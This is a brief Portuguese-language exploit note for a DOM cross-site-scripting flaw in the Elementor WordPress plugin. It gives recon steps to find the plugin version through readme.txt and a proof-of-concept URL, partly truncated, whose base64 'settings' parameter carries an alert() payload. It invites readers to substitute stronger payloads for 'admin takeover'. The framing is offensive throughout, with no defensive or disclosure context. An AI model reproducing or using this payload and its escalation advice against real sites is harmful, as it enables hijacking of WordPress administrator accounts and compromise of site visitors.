DOM Cross-Site-Scripting Elementor POC
RECON ON TARGET
Para encontrar a versão instalada do plug-in Elementor no destino manualmente
Use: https://target.com/wp-content/plugins/e … readme.txt
Para testar / ativar o Xss no destino
Alerta XSS SAMPLE POC EXPLOIT : https://target.com/#elementor-actio...i … NyaXB0PiJ9
para iniciantes: PARAM: settings=base64
contém o código js alert(), você pode alterá-lo para exploits xss mais interessantes (admin takeover e etc)